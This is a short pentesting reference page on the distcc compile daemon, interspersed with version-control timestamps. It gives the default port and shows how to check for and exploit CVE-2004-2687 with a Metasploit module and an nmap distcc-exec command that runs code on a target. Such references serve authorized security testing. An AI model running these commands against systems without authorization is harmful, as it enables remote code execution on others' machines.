2020-07-15 15:43:14 +00:00
# 3632 - Pentesting distcc
## Basic Information
Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed
2021-11-30 16:46:07 +00:00
**Default port:** 3632
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
PORT STATE SERVICE
3632/tcp open distccd
```
## Exploitation
Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 < ip > --script distcc-exec --script-args="distcc-exec.cmd='id'"
```
2020-10-05 10:16:52 +00:00
## Shodan
_I don't think shodan detects this service._
2020-07-15 15:43:14 +00:00
## Resources
2021-11-30 16:46:07 +00:00
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec ](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec )
2020-07-15 15:43:14 +00:00
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855 ](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855 )
2021-10-18 11:21:18 +00:00
Post created by **Álex B (@r1p)**
